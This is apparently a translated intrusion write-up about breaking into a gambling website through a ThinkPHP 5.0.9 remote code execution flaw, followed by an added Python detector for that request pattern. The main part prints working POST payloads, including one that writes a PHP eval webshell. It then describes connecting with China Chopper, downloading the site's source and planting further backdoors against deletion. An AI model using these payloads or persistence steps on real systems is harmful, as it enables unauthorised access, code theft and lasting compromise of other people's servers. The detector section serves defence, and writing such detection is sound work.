
0x01 Determine the target

Main site: (screenshot)

Side station (another site hosted on the same server): (screenshot)

0x02 Vulnerability Exploit

Information gathering showed the site runs ThinkPHP (tp) v5.0.9, a version with a known ThinkPHP RCE vulnerability.

(screenshot)

Test directly with the public payload. POST body:

_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

(screenshot)

phpinfo() reports PHP 5.4.45.

Trying to get a shell directly:

(screenshot)

system() is disabled, and trying the other command-execution functions gives the same result.

(screenshot)

Checking disable_functions in phpinfo shows which functions are disabled.

(screenshot)

Look for a way to bypass this and write a webshell (I was stuck here for a long time).

Finally, a friend who does penetration testing pointed out the following: file_put_contents can be used to write the shell directly. After thinking about it for so long, I had forgotten that other functions can write the shell directly; there is no need to go through a system command. My fundamentals are still weak. Thanks again!

(screenshot)

0x03 getshell

Construct the payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

(screenshot)

The write succeeds; connect with Caidao (China Chopper).

(screenshot)

Connected successfully.

Check privileges:

(screenshot)

A remote security mode turns out to be enabled.

Attempts to bypass it ran into many disabled functions, and the attempt was not successful.

Download the source code:

(screenshot)

Deploy more backdoors to guard against deletion.

0x04 Summary

1. Opening the BC (gambling) site, the version information in the page footer showed that the framework is ThinkPHP v5.0.9, which has an RCE vulnerability.

Post: _method=__construct&filter[]=assert&method=get&get[]=phpinfo()

2. phpinfo showed PHP 5.4.45. Trying to execute commands directly showed that system() and the other command-execution functions were disabled.

Post: _method=__construct&filter[]=assert&method=get&get[]=whoami

3. Although the command-execution functions are disabled, file_put_contents can still be used to write the shell directly, bypassing the restriction.

4. Getshell

Construct the payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

5. The write succeeds; connect with Caidao (China Chopper).
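As an added defender-side example (not part of the original post): a small Python detector for the request shape used in steps 1 to 4, run over constructed sample POST bodies. The parameter names follow the payload above; the list of dangerous callables and the sample log records are assumptions of this example, not data from the write-up.

```python
# Added example, not from the original post: flag the ThinkPHP 5.0.x
# "_method=__construct" filter-injection request shape in form-encoded POST bodies.
import re
from urllib.parse import parse_qs

# Callables that turn a request parameter into code or command execution when
# injected through filter[] (assumption: a representative list, not exhaustive).
DANGEROUS_FILTERS = {"assert", "system", "exec", "passthru", "shell_exec",
                     "popen", "proc_open", "eval", "call_user_func"}
# Argument content typical of a webshell drop: file write, eval, or a request
# superglobal used as code input.
WEBSHELL_ARG = re.compile(
    r"file_put_contents\s*\(|eval\s*\(|\$_(?:POST|GET|REQUEST)\[", re.I)

def analyze_body(body: str) -> dict:
    """Return {'verdict': block|suspicious|clean, 'findings': [...]} for one body."""
    params = parse_qs(body, keep_blank_values=True)
    override = params.get("_method", [""])[0]
    filters = params.get("filter[]", []) + params.get("filter", [])
    injected = params.get("get[]", []) + params.get("get", [])
    findings = []
    if override == "__construct":
        findings.append("_method=__construct: override aimed at the Request constructor")
    bad = [f for f in filters if f.lower() in DANGEROUS_FILTERS]
    if bad:
        findings.append("filter[] set to a callable: " + ", ".join(bad))
    if any(WEBSHELL_ARG.search(arg) for arg in injected):
        findings.append("get[] carries a file-write or eval payload")
    # Only the constructor override paired with a callable filter blocks; a normal
    # override such as _method=get with a harmless filter like trim stays clean.
    verdict = ("block" if override == "__construct" and bad
               else "suspicious" if findings else "clean")
    return {"verdict": verdict, "findings": findings}

def scan_log(lines):
    """Records look like '<ip> <method> <path> <url-encoded body>'; return
    (ip, path, verdict) for every request that is not clean."""
    hits = []
    for line in lines:
        ip, _, path, body = line.split(" ", 3)
        result = analyze_body(body)
        if result["verdict"] != "clean":
            hits.append((ip, path, result["verdict"]))
    return hits

# Constructed sample records (not real traffic); the second body is the write-up's
# webshell-write payload, URL-encoded as a client would send it.
SAMPLE_LOG = [
    "203.0.113.5 POST /index.php _method=__construct&filter[]=assert&method=get&get[]=phpinfo()",
    "203.0.113.5 POST /index.php _method=__construct&filter[]=assert&method=get"
    "&get[]=file_put_contents('a.php','%3C%3Fphp%20eval(%24_POST%5Ba%5D)%3F%3E')",
    "198.51.100.7 POST /login username=alice&password=hunter2",
    "198.51.100.9 POST /api/list _method=get&filter[]=trim&get[]=x",
]
```

Detection of this shape at the edge is a stop-gap; the fix on the application side is updating ThinkPHP to a release that no longer passes `_method` through to `Request::__construct`.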

Source: https://xz.aliyun.com/t/9232
